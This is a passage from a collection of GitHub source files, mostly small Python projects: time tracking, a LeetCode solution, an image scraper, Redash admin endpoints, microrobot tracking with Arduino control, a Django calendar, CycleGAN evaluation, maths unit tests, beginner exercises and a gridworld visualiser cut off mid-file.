(/tmp/GW_TEMP_BACKUP)\n # just in case, as anyway builds are in Travis Docker containers\n cleanup_backup_local_path(backup_local_path)\n","repo_name":"setevoy2/rtfm","sub_path":"14827/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"5723576508","text":"from timew import timewarrior\nfrom datetime import date, datetime, timedelta\nimport subprocess\n\n\ndef calculate_totals():\n date_format = '%Y%m%dT%H%M%SZ'\n\n tw = timewarrior.TimeWarrior()\n summary = tw.summary('1970-01-01', datetime.now())\n unproductive_tags = get_unproductive_tags()\n\n totals = {}\n for entry in summary:\n start = datetime.strptime(entry['start'], date_format)\n if 'end' in entry:\n end = datetime.strptime(entry['end'], date_format)\n else:\n end = datetime.utcnow()\n\n elapsed = end - start\n week = start.strftime('%Y-%U')\n if week not in totals:\n totals[week] = {\n '_all': timedelta(0),\n '_prod': timedelta(0)\n }\n\n for tag in entry['tags']:\n if tag in totals[week]:\n totals[week][tag] += elapsed\n else:\n totals[week][tag] = elapsed\n\n totals[week]['_all'] += elapsed\n\n if is_productive(entry['tags'], unproductive_tags):\n totals[week]['_prod'] += elapsed\n\n for week in totals:\n for tag in totals[week]:\n totals[week][tag] = timedelta_format(totals[week][tag])\n\n return totals\n\n\ndef timedelta_format(delta):\n total_seconds = int(delta.total_seconds())\n hours, remainder = divmod(total_seconds, 60 * 60)\n minutes, seconds = divmod(remainder, 60)\n\n return f'{hours:02}:{minutes:02}:{seconds:02}'\n\n\ndef get_unproductive_tags():\n config_key = 'custom.unproductive_tags'\n\n result = subprocess.run(\n ['timew', 'get', f'dom.rc.{config_key}'], capture_output=True, text=True)\n tags = result.stdout.strip().split(',')\n return tags\n\n\ndef is_productive(entry_tags, unproductive_tags):\n for tag in entry_tags:\n if tag not in unproductive_tags:\n return True\n\n return False\n","repo_name":"rc2dev/timew-web-report","sub_path":"tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"70268920193","text":"from typing import List\nfrom collections import defaultdict\n\nclass Solution:\n def fourSumCount(self, nums1: List[int], nums2: List[int], nums3: List[int], nums4: List[int]) -> int:\n dict, ans = defaultdict(int), 0\n for i in nums1:\n for j in nums2:\n dict[i+j] +=1\n for k in nums3:\n for l in nums4:\n ans += dict[0 - (k + l)]\n return ans\n\ns = Solution()\ns.fourSumCount()","repo_name":"zaoad/Leetcode","sub_path":"454_sum_II.py","file_name":"454_sum_II.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43631589036","text":"# /usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport requests\nimport re\n\n\nhead = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/70.0.3538.67 Safari/537.36'}\n\nurl=input('输入url')\nres=requests.get(url='{}'.format(url),headers=head)\na=res.content.decode('UTF-8')\nzhengze=input('请输入正则表达式')\npatt=re.compile('{}'.format(zhengze))\nitems=patt.findall(a)\naaa=0\nfor i in items:\n if \" title=\" in i:\n i='http://mpic.spriteapp.cn/'+i\n i=i.split('\"')[0]\n tupian=requests.get(url=i)\n res1=tupian.content\n if 'gif' in i:\n with open(r'C:\\Users\\meng\\Desktop\\python\\图片1\\{}.gif'.format(aaa),'wb') as f:\n f.write(res1)\n aaa+=1\n elif 'jpg' in i:\n with open(r'C:\\Users\\meng\\Desktop\\python\\图片1\\{}.jpg'.format(aaa), 'wb') as f:\n f.write(res1)\n aaa += 1\n\n\n","repo_name":"menglf1203/python","sub_path":"课堂/爬图片.py","file_name":"爬图片.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37039386195","text":"import json\n\nfrom flask import request\nfrom flask_login import login_required\nfrom redash import models, redis_connection\nfrom redash.handlers import routes\nfrom redash.handlers.base import json_response\nfrom redash.permissions import require_super_admin\nfrom redash.tasks.queries import QueryTaskTracker\n\n\n@routes.route('/api/admin/queries/outdated', methods=['GET'])\n@require_super_admin\n@login_required\ndef outdated_queries():\n manager_status = redis_connection.hgetall('redash:status')\n query_ids = json.loads(manager_status.get('query_ids', '[]'))\n if query_ids:\n outdated_queries = (models.db.session.query(models.Query)\n .outerjoin(models.QueryResult)\n .filter(models.Query.id.in_(query_ids))\n .order_by(models.Query.created_at.desc()))\n else:\n outdated_queries = []\n\n return json_response(\n dict(queries=[q.to_dict(with_stats=True, with_last_modified_by=False)\n for q in outdated_queries],\n updated_at=manager_status['last_refresh_at']))\n\n\n@routes.route('/api/admin/queries/tasks', methods=['GET'])\n@require_super_admin\n@login_required\ndef queries_tasks():\n global_limit = int(request.args.get('limit', 50))\n waiting_limit = int(request.args.get('waiting_limit', global_limit))\n progress_limit = int(request.args.get('progress_limit', global_limit))\n done_limit = int(request.args.get('done_limit', global_limit))\n\n waiting = QueryTaskTracker.all(QueryTaskTracker.WAITING_LIST, limit=waiting_limit)\n in_progress = QueryTaskTracker.all(QueryTaskTracker.IN_PROGRESS_LIST, limit=progress_limit)\n done = QueryTaskTracker.all(QueryTaskTracker.DONE_LIST, limit=done_limit)\n\n response = {\n 'waiting': [t.data for t in waiting if t is not None],\n 'in_progress': [t.data for t in in_progress if t is not None],\n 'done': [t.data for t in done if t is not None]\n }\n\n return json_response(response)\n","repo_name":"repertory/docker-redash","sub_path":"data/redash/redash/handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"60"} +{"seq_id":"21839713516","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 24 15:51:31 2022\n\n@author: bizzarohd\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom pySerialTransfer import pySerialTransfer as txfer\n\n\n\n\n'''\nsignal output is now compeltely indpendent of frame rate\nI just send an actions list to arduino mega which has 12 PWM outputs \n'''\n\ncontrol_params = {\n \"lower_thresh\": 0,\n \"upper_thresh\": 100,\n \"bounding_length\" : 10,\n \"area_filter\": 3,\n \"field_strength\": 1,\n \"rolling_frequency\": 10.0,\n \"gamma\": 90\n } \ncamera_params = {\n \"resize_scale\": 50,\n \"framerate\": 60,\n \"exposure\": 5000\n } \n\n\nclass Robot:\n '''\n Robot class to store and ID all new robots\n '''\n def __init__(self):\n self.Position_List = []\n self.Area_List = []\n self.Cropped_frame = []\n self.Avg_Area = 0\n self.Time = []\n self.Frequency = []\n self.Alpha_List = []\n \n def add_area(self,Area):\n self.Area_List.append(Area)\n \n def add_position(self, Position):\n self.Position_List.append(Position)\n \n def add_frame(self,Frame):\n self.Frame_List.append(Frame)\n \n def add_Crop(self,Crop):\n self.Cropped_frame.append(Crop)\n \n def set_Avg_Area(self,Avg_Area):\n self.Avg_Area = Avg_Area\n \n def add_time(self,time):\n self.Time.append(time)\n \n def add_freq(self,f):\n self.Frequency.append(f)\n \n def add_alphas(self, alph):\n self.Alpha_List.append(alph)\n\n\n\n\n\nclass Experiment():\n def __init__(self):\n self.Robot_List = []\n self.num_bots = 0 \n self.frame_num = 0 \n\n\n def mousePoints(self,event,x,y,flags,params):\n \n '''\n Mouse Callback. To run when the left mouse is clicked\n Initilize a new robot instance on each mouse click\n '''\n # Left button mouse click event opencv\n if event == cv2.EVENT_LBUTTONDOWN:\n \n x1 = int(x-control_params[\"bounding_length\"]/2)\n y1 = int(y-control_params[\"bounding_length\"]/2)\n w = control_params[\"bounding_length\"]\n h = control_params[\"bounding_length\"]\n \n robot = Robot()\n robot.add_Crop([x1,y1,w,h])\n \n self.Robot_List.append(robot)\n self.num_bots += 1\n \n def Send(self,arduino,alpha,freq,typ):\n message = arduino.tx_obj([float(alpha),float(freq),float(typ)]) #float(0) => Rolling\n arduino.send(message)\n print(\"sent\")\n \n \n\n def Tracker(self, arduino, actions): \n\n '''\n connect to camera and pperform real time tracking and analysis of MR\n ''' \n #cam = EasyPySpin.VideoCapture(0)\n cam = cv2.VideoCapture(\"/Users/bizzarohd/Desktop/UpdateOctober/mickyroll1.mp4\") \n width = int(cam.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cam.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n\n cv2.namedWindow(\"im\")\n\n while True:\n #!!! Step 1: read the frame and adjust it\n success,frame = cam.read()\n \n resize_scale = camera_params[\"resize_scale\"]\n cam.set(cv2.CAP_PROP_EXPOSURE,camera_params[\"exposure\"])\n frame = cv2.resize(frame, (int(width*resize_scale/100),int(height*resize_scale/100)),interpolation = cv2.INTER_AREA)\n \n self.frame_num += 1\n cv2.setMouseCallback(\"im\", self.mousePoints)\n \n \n if self.num_bots > 0: #for each defined robot, update stuff\n \n #!!! Step 2: recieve action commands, either from joystick or exterinally\n if actions is not None:\n #read input arrays\n timestamp = self.frame_num\n if timestamp < len(actions[0]):\n \n alpha = actions[0][timestamp]\n freq = actions[1][timestamp]\n typ = actions[2]\n print(\"sent\")\n else:\n print(\"-- End of Trajectory --\")\n \n else: \n #read joystick...\n alpha = np.random.randint(-10,10) #control direction\n freq = np.random.randint(0,20) # control speed\n typ = 0\n \n \n \n #!!! Step 3: send those action commands to arduino\n self.Send(arduino,alpha,freq,typ)\n \n \n #!!! Step 4: detect,track, and update robot parameters\n for bot in range(len(self.Robot_List)):\n \n x1,y1,x2,y2 = self.Robot_List[bot].Cropped_frame[-1]\n \n x1 = max(min(x1,width),0)\n y1 = max(min(y1,height),0)\n cropped_frame = frame[y1:y1+y2, x1:x1+x2]\n \n \n #carry out mask and thresholding on GPU\n #gpu_frame = cv2.cuda_GpuMat()\n #gpu_frame.upload(cropped_frame)\n\n #gpu_frame = cv2.cuda.cvtColor(gpu_frame, cv2.COLOR_BGR2GRAY)\n crop_mask = cv2.cvtColor(cropped_frame, cv2.COLOR_BGR2GRAY)\n crop_mask = cv2.GaussianBlur(crop_mask, (21,21), 0)\n crop_mask = cv2.inRange(crop_mask, (control_params[\"lower_thresh\"]),(control_params[\"upper_thresh\"]))\n #ret,gpu_frame = cv2.cuda.threshold(gpu_frame, control_params[\"upper_thresh\"],255,cv2.THRESH_BINARY)\n #gpu_frame = cv2.cuda.bitwise_not(gpu_frame)\n #crop_mask = gpu_frame.download()\n \n #find contours and areas of contours \n contours,_ = cv2.findContours(crop_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n \n area_threshold_lower = self.Robot_List[bot].Avg_Area /control_params[\"area_filter\"]\n area_list = []\n w_list = [] #creating these lists to store all conoutrs because I only want the first w,h not the most recent one\n h_list = []\n for cnt in contours:\n #remove small elements by calcualting arrea\n area = cv2.contourArea(cnt)\n \n if area > area_threshold_lower:# and area < 3000:# and area < 2000: #pixels\n area_list.append(area)\n \n x,y,w,h = cv2.boundingRect(cnt)\n current_pos = [(x+x+w)/2, (y+y+h)/2]\n w_list.append(w)\n h_list.append(h)\n\n cv2.rectangle(cropped_frame, (x,y), (x+w,y+h),(255,0,0),1)\n cv2.drawContours(cropped_frame,[cnt], -1,(0,255,255),1)# -1: draw all\n \n \n if area_list:\n \n #cacluate and analyze contours areas\n avg_area = sum(area_list)/len(area_list)\n self.Robot_List[bot].add_area(avg_area)\n \n avg_global_area = sum(self.Robot_List[bot].Area_List)/len(self.Robot_List[bot].Area_List)\n self.Robot_List[bot].set_Avg_Area(avg_global_area)\n #update cropped region based off new position and average area\n \n x1new = x1+current_pos[0]-max(w_list)\n y1new = y1+current_pos[1]-max(h_list)\n x2new = 2*max(w_list)\n y2new = 2*max(h_list)\n new_crop = [int(x1new), int(y1new), int(x2new), int(y2new)]\n \n #update robots params\n self.Robot_List[bot].add_Crop(new_crop)\n self.Robot_List[bot].add_position([current_pos[0]+x1, current_pos[1]+y1]) \n self.Robot_List[bot].add_time(time.time())\n self.Robot_List[bot].add_freq(freq)\n self.Robot_List[bot].add_alphas(alpha)\n \n \n color = plt.cm.rainbow(np.linspace(0, 1, self.num_bots))*255 \n for bot,c in zip(range(self.num_bots),color):\n #display dragon tails \n pts = np.array(self.Robot_List[bot].Position_List, np.int32)\n cv2.polylines(frame, [pts], False, c, 1)\n \n \n \n #!!! Step 5: display the frames\n cv2.imshow(\"im\", frame)\n k = cv2.waitKey(1000)\n if k == ord(\"q\"):\n break\n \n #close coils\n message = arduino.tx_obj([float(0),float(0),float(4)]) #float(4) => Close\n arduino.send(message)\n \n #close camera\n cam.release()\n cv2.destroyAllWindows()\n\n\n\ndef run_exp(actions):\n '''\n press left mouse button on robot to detect\n press q to exit the window\n \n Parameters:\n actions : if None == learn via joystick\n else: pass actions list [alpha,freq,type].right now it just indexs through the list by frame number\n aim : 1 = LEARN, 2 = RL\n Returns: (X,Y,alpha,time,freq) if bots were detected\n None if else\n\n '''\n #connect to arduino\n arduino = txfer.SerialTransfer('/dev/cu.usbserial-210')\n arduino.open()\n Exp = Experiment() #create an experiement\n Exp.Tracker(arduino,actions) #run the tracker\n \n if len(Exp.Robot_List) > 0:\n MyRobot = Exp.Robot_List[-1] # only use last robot in list of clicked on robots\n \n X = np.array(MyRobot.Position_List)[:,0]\n Y = np.array(MyRobot.Position_List)[:,1]\n alpha = np.array(MyRobot.Alpha_List)\n time= np.array(MyRobot.Time)\n freq= np.array(MyRobot.Frequency)\n print(\"-- robies detected --\")\n return X,Y,alpha,time,freq\n else:\n print(\"-- no robies --\")\n return None\n\n arduino.close()\n\n return X,Y,alpha,time,freq\n\nif __name__ == '__main__':\n #actions\n a = np.arange(0,360,1) #alpha\n b = [] \n for i in range(0,360):\n b.append(5)\n c = 0\n\n actions = None#[a,b,c]\n\n \n X,Y,alpha,time,freq = run_exp(actions) \n\n","repo_name":"SuhailSama/MR_RL","sub_path":"MR_experiment.py","file_name":"MR_experiment.py","file_ext":"py","file_size_in_byte":10912,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"25285565854","text":"# https://www.huiwenteo.com/normal/2018/07/29/django-calendar-ii.html\nfrom datetime import datetime, timedelta\nfrom calendar import HTMLCalendar\nfrom .models import Workout\n\nclass Calendar(HTMLCalendar):\n\tdef __init__(self, year=None, month=None):\n\t\tself.year = year\n\t\tself.month = month\n\t\tsuper(Calendar, self).__init__()\n\n\t# formats a day as a td\n\t# filter workouts by day\n\tdef formatday(self, day, workouts, user):\n\t\tworkouts_per_day = workouts.filter(day__day=day, user_id=user.id)\n\t\td = ''\n\t\tfor workout in workouts_per_day:\n\t\t\tcolor = 'yellow'\n\t\t\tif workout.complete:\n\t\t\t\tcolor = 'green'\n\t\t\td += f'
    {workout.get_html_url}
    '\n\n\t\tif day != 0:\n\t\t\treturn f\"{day}
      {d}
    \"\n\t\treturn ''\n\n\t# formats a week as a tr \n\tdef formatweek(self, theweek, workouts, user):\n\t\tweek = ''\n\t\tfor d, weekday in theweek:\n\t\t\tweek += self.formatday(d, workouts, user)\n\t\treturn f' {week} '\n\n\t# formats a month as a table\n\t# filter workouts by year and month\n\tdef formatmonth(self, user, withyear=True):\n\t\tworkouts = Workout.objects.filter(day__year=self.year, day__month=self.month)\n\n\t\tcal = f'\\n'\n\t\tcal += f'{self.formatmonthname(self.year, self.month, withyear=withyear)}\\n'\n\t\tcal += f'{self.formatweekheader()}\\n'\n\t\tfor week in self.monthdays2calendar(self.year, self.month):\n\t\t\tcal += f'{self.formatweek(week, workouts, user)}\\n'\n\t\treturn cal\n","repo_name":"mitchdmarino/Flex","sub_path":"workout/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29159111965","text":"import os\nfrom shutil import copy\nimport random\n\nimport argparse\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nimport torch\nfrom torchvision import utils\nfrom torch import nn\nimport os\nimport numpy as np\nfrom model import Generator\nfrom dataset import ImgDataset\nfrom Unet import Unet\nfrom utils import *\nfrom PIL import Image\nimport pickle\npalette = [ ( 0, 0, 0),\n( 0, 0, 0), \n( 0, 0, 0),\n( 0, 0, 0), \n( 0, 0, 0), \n(111, 74, 0), \n( 81, 0, 81),\n(128, 64,128),\n(244, 35,232),\n(250,170,160),\n(230,150,140),\n( 70, 70, 70),\n(102,102,156),\n(190,153,153),\n(180,165,180),\n(150,100,100),\n(150,120, 90),\n(153,153,153),\n(153,153,153),\n(250,170, 30),\n(220,220, 0),\n(107,142, 35),\n(152,251,152),\n( 70,130,180),\n(220, 20, 60),\n(255, 0, 0),\n( 0, 0,142),\n( 0, 0, 70),\n( 0, 60,100),\n( 0, 0, 90),\n( 0, 0,110),\n( 0, 80,100),\n( 0, 0,230),\n(119, 11, 32),\n( 0, 0,142)]\n\n# gta2city = {0:0, 1:5, 2:23, 3:7, 4:8, 5:9, 6:22, 7:21, 8:21, 9:11, 10:5, 11:4, 12:, 13:19, 14:20, 15:, 16:}\n\n# apath = '/scratch/zikunc/cygan/ds_small/trainA'\n# alabelpath = '/scratch/zikunc/cygan/ds_small/trainA_labels'\n\n# domainA = sorted([f for f in os.listdir(apath) if f.endswith('.jpg')])\n# domainA_labels = sorted([f for f in os.listdir(alabelpath) if f.endswith('.jpg')])\n# idxs = random.sample(range(len(domainA)), 300)\n# cityTestPath = '/scratch/zikunc/cygan_/testCITY'\n\n# for idx in idxs:\n# \tcopy(os.path.join(apath, domainA[idx]),os.path.join(cityTestPath, 'x', domainA[idx]))\n# \tcopy(os.path.join(alabelpath, domainA_labels[idx]),os.path.join(cityTestPath, 'gt', domainA_labels[idx]))\n\n\n\n\n\n# bpath = '/scratch/zikunc/cygan_/ds_fullcity/trainB'\n# blabelpath = '/scratch/zikunc/cygan_/out'\n\n# domainB = sorted([f for f in os.listdir(bpath) if f.endswith('.png')])\n# domainB_labels = sorted([f for f in os.listdir(blabelpath) if f.endswith('.png')])\n# idxs = random.sample(range(len(domainB)), 300)\n# gtaTestPath = '/scratch/zikunc/cygan_/testGTA'\n\n# for idx in idxs:\n# \tcopy(os.path.join(bpath, domainB_labels[idx]),os.path.join(gtaTestPath, 'x', domainB_labels[idx]))\n# \tcopy(os.path.join(blabelpath, domainB_labels[idx]),os.path.join(gtaTestPath, 'gt', domainB_labels[idx]))\n\n\ndef main(args):\n\n segmen_A = Unet(3, 34).to(args.device)\n\n if args.model_path is not None:\n segmen_path = os.path.join(args.model_path,'semsg.pt')\n\n with open(segmen_path, 'rb') as f:\n state_dict = torch.load(f)\n segmen_A.load_state_dict(state_dict)\n\n else:\n raise Exception('please specify model path!')\n\n segmen_A = nn.DataParallel(segmen_A)\n\n transforms_ = [ transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]\n testloader = DataLoader(ImgDataset(args.image_path, transforms_=transforms_, mode='eval_unet'),\n batch_size=args.batchSize, shuffle=False, num_workers=0)\n\n segmen_A.eval()\n\n with torch.no_grad():\n total_iou = []\n for i, batch in enumerate(testloader):\n name, toTest, labels = batch\n #segmentation\n pred_label = segmen_A(toTest)\n for idx in range(args.batchSize):\n pred = pred_label[idx].cpu().numpy()\n label = labels.cpu().numpy()[idx]\n img = np.zeros((label.shape[0],label.shape[1],3)).astype('uint8')\n original_img = np.zeros((label.shape[0],label.shape[1],3)).astype('uint8')\n prediction = np.zeros((label.shape[0],label.shape[1])).astype('uint8')\n for c in range(len(palette)):\n indices = np.argmax(pred,axis=0)==c\n prediction[indices]=c\n img[indices] = palette[c]\n original_img[label==c] = palette[c]\n original_img = Image.fromarray(original_img.astype('uint8'))\n original_img.save(os.path.join(args.out_dir,'original_'+name[idx].replace('jpg','png')))\n img = Image.fromarray(img.astype('uint8'))\n img.save(os.path.join(args.out_dir,name[idx].replace('jpg','png')))\n total_iou.append(IOU(prediction, label, 34))\n print(sum(total_iou)/len(total_iou))\n # f = open('mapping.pkl', 'wb')\n # pickle.dump(mapping, f)\n # f.close()\n\n # print(sum(total_iou)/len(total_iou))\n\n\n # for idx in range(len(name)):\n # utils.save_image(torch.cat((toTest[idx].to(args.device), recovered[idx], transformed_[idx]),axis=1), os.path.join(args.out_dir, args.direction+'_'+name[idx].split('/')[-1]), normalize=True, range=(-1, 1))\n\n\n\n\n\n\nif __name__ == '__main__':\n import os\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--image_path', type=str, help='path to the test images')\n parser.add_argument('--model_path', type=str, help='path to the model checkpoint', default=None)\n parser.add_argument('--out_dir', type=str, help='output dir', default='./')\n parser.add_argument('--device', type=str, help='set the device', default='cuda')\n parser.add_argument('--in_channel', type=int, default=3, help='number of channels of input data')\n parser.add_argument('--out_channel', type=int, default=3, help='number of channels of output data')\n parser.add_argument('--batchSize', type=int, default=1, help='size of the batches')\n parser.add_argument('--direction', type=str, default='AB', help='direction of domain transfer')\n\n args = parser.parse_args()\n print(args)\n\n if torch.cuda.is_available() and args.device != 'cuda':\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n if not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n args.device = torch.device(args.device)\n main(args)\n\n\n","repo_name":"zikuncshelly/cycleGAN_with_segmentation","sub_path":"test_semseg.py","file_name":"test_semseg.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"17393923618","text":"\"\"\"\r\nEste archivo contiene las constantes que se usan en el programa.\r\n\"\"\"\r\nimport os\r\n\r\narl: dict[str, float] = {\r\n \"riesgo_1\": 0.00522, # 0.522%\r\n \"riesgo_2\": 0.01044, # 1.044%\r\n \"riesgo_4\": 0.04350, # 4.350%\r\n}\r\n\r\n\r\nclass Administrativo:\r\n \"\"\"Clase que representa un empleado administrativo\"\"\"\r\n\r\n id = 1\r\n valor_hora = 20000\r\n valor_hora_extra = 25000\r\n riesgo_arl = arl[\"riesgo_1\"]\r\n cargo = \"Administrativo\"\r\n\r\n\r\nclass Operativo:\r\n \"\"\"Clase que representa un empleado operativo\"\"\"\r\n\r\n id = 2\r\n valor_hora = 40000\r\n valor_hora_extra = 0\r\n cargo: dict[str, str] = {\r\n \"oficios_generales\": \"Oficios generales\",\r\n \"conductor\": \"Conductor\",\r\n \"vigilante\": \"Vigilante\",\r\n }\r\n riesgo_arl: dict[str, float] = {\r\n \"oficios_generales\": arl[\"riesgo_1\"],\r\n \"conductor\": arl[\"riesgo_2\"],\r\n \"vigilante\": arl[\"riesgo_4\"],\r\n }\r\n horas_trabajadas: dict[str, int] = {\r\n \"oficios_generales\": 100,\r\n \"conductor\": 160,\r\n \"vigilante\": 336,\r\n }\r\n\r\n\r\ndef limpiar_pantalla() -> None:\r\n \"\"\"\r\n Esta función se encarga de limpiar la pantalla de la consola\r\n \"\"\"\r\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\r\n","repo_name":"ZUR1C4T0/pyroll-module-cli","sub_path":"utilidades/constantes.py","file_name":"constantes.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30221274609","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/1/10 23:38\n# @Author : xls56i\n\nfrom __future__ import print_function\nimport networks\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport cv2\nimport os, datetime\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"7\"\n\nparser = argparse.ArgumentParser(description='PyTorch CycleGAN')\nparser.add_argument('--set_dir', default='../dataset/CT_Data_All_Patients/test', type=str,\n help='directory of test dataset')\nparser.add_argument('--model_dir', default='./models/DnCNNB-simulation-60mAs_G_A',\n help='directory of the model:G_A==>high2low,simulate, G_B==>low2high,denoising')\nparser.add_argument('--model_name', default='model_001_007.pth', type=str, help='the model name')\nparser.add_argument('--isTrain', default=False, help='Train or Test')\nparser.add_argument('--result_dir', default='../dataset/CT_Data_All_Patients/test002030_simulate60mAs', type=str, help='directory of test dataset')\n\nargs = parser.parse_args()\n\n\ndef log(*args, **kwargs):\n print(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S:\"), *args, **kwargs)\n\nif __name__ == '__main__':\n\n cuda = torch.cuda.is_available()\n\n netG = networks.define_G(1, 1, 64, 'unet_64', 'batch', False, 'normal', 0.02)\n\n if cuda:\n netG = netG.cuda()\n device_ids = [0]\n netG = nn.DataParallel(netG, device_ids=device_ids).cuda()\n\n netG.load_state_dict(torch.load(os.path.join(args.model_dir, args.model_name)))\n log('load trained model')\n\n netG.eval() # evaluation mode\n\n if not os.path.exists(args.result_dir):\n os.makedirs(args.result_dir)\n\n for im in os.listdir(args.set_dir):\n if im.endswith(\".tif\") or im.endswith(\".jpg\") or im.endswith(\".bmp\") or im.endswith(\".png\"):\n x = cv2.imread(os.path.join(args.set_dir, im), 0)\n pre_img = x\n height, weight = x.shape\n resize_h = round(height / 64) * 64\n resize_w = round(weight / 64) * 64\n x = cv2.resize(x, (resize_w, resize_h), interpolation=cv2.INTER_LINEAR)\n x = np.array(x, dtype=np.float32) / 255.0\n x = torch.from_numpy(x).view(1, -1, x.shape[0], x.shape[1])\n\n x_ = netG(x) # inference\n x_ = x_.view(x_.shape[2], x_.shape[3])\n x_ = x_.cpu()\n x_ = x_.detach().numpy().astype(np.float32)\n x_ = cv2.resize(x_, (weight, height), interpolation=cv2.INTER_LINEAR)\n\n x_[np.where(pre_img == 0)] = 0\n x_ = x_ * 255.0\n x_ = np.array(x_, dtype='uint8')\n cv2.imwrite(os.path.join(args.result_dir, im), x_)\n","repo_name":"cswin/PIMA-CT","sub_path":"Simulation_Evaluation/simulate_data.py","file_name":"simulate_data.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"13990492484","text":"import unittest\n\nimport maths_questions as maths_q\n\n\nclass MathsQuestionsTest(unittest.TestCase):\n\n def test_divisible_by_r(self):\n\n answer = maths_q.divisible_by_r(4, 6)\n self.assertEqual(answer, 12)\n\n answer = maths_q.divisible_by_r(55, 40)\n self.assertEqual(answer, 440)\n\n def test_generate_rand_7(self):\n\n ans = maths_q.generate_rand_7()\n print('Random number -> ', ans)\n\n def test_sample_distribution(self):\n\n numbers = [1, 2, 3, 4]\n probabilities = [0.1, 0.2, 0.3, 0.4]\n\n new_nums = maths_q.sample_distribution(numbers,\n probabilities,\n 10)\n print('New samples ->', new_nums)\n\n def test_factorial_trailing_zero(self):\n\n zero_count = maths_q.factorial_trailing_zero(5)\n self.assertEqual(zero_count, 1)\n\n zero_count = maths_q.factorial_trailing_zero(28)\n self.assertEqual(zero_count, 6)\n\n zero_count = maths_q.factorial_trailing_zero(200)\n self.assertEqual(zero_count, 49)\n\n def test_closest_palindrome_number(self):\n\n closest_pal = maths_q.closest_palindrome_number(1234)\n self.assertEqual(closest_pal, 1221)\n\n closest_pal = maths_q.closest_palindrome_number(99)\n self.assertEqual(closest_pal, 101)\n\n closest_pal = maths_q.closest_palindrome_number(90)\n self.assertEqual(closest_pal, 88)\n\n closest_pal = maths_q.closest_palindrome_number(121)\n self.assertEqual(closest_pal, [131, 111])\n\n\n closest_pal = maths_q.closest_palindrome_number(911)\n self.assertEqual(closest_pal, 909)\n\n\n closest_pal = maths_q.closest_palindrome_number(502)\n self.assertEqual(closest_pal, 505)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Bryan-Rathos/coding-interview-arena","sub_path":"code/python/maths_questions_test.py","file_name":"maths_questions_test.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"25144962083","text":"#Faça um programa que simule um salão de beleza. \n#O usuário deverá digitar o nome e o serviço desejado (corte de cabelo ou manicure). \n#O programa deve exibir uma mensagem confirmando o serviço escolhido e perguntar \n#se o usuário deseja agendar outro serviço. \n#O laço deve continuar até que o usuário decida encerrar o atendimento.\n\n\nwhile True:\n nome = input(\"Digite seu nome: \\n\")\n servico = input(\"Digite o serviço que você deseja: corte de cabelo ou manicure: \\n\")\n\n print(f\"O serviço de {servico} foi marcado para {nome}\")\n\n opcao = input(\"Deseja agendar outro serviço ? (s/n) \\n\")\n if opcao.lower() != \"s\":\n break","repo_name":"MiVeiga/Jornada-Ciencia-de-Dados","sub_path":"Módulo_1/Aula 3/exercicio_30.py","file_name":"exercicio_30.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"31350305268","text":"from boarld.gridworld.rl.agent.GridAgent import GridAgent\nfrom boarld.gridworld.visual.tk.AbstractVisualGrid import AbstractVisualGrid\nfrom boarld.core.util.observ.Observable import Observable\nfrom boarld.core.util.observ.Observer import Observer\n\n\nclass VisualGridAgentTraining(AbstractVisualGrid, Observer):\n\n def __init__(self, agent: GridAgent):\n self.agent: GridAgent = agent\n super().__init__(agent.board)\n self.add_observable(agent)\n self.path_circles = {}\n self.path_lines = {}\n\n def act_on_notify(self, observable: Observable):\n\n tuples = [(s.data.x, s.data.y) for s in self.agent.traveled_path]\n\n for y in range(self.grid.nb_rows):\n for x in range(self.grid.nb_cols):\n key = (x, y)\n if 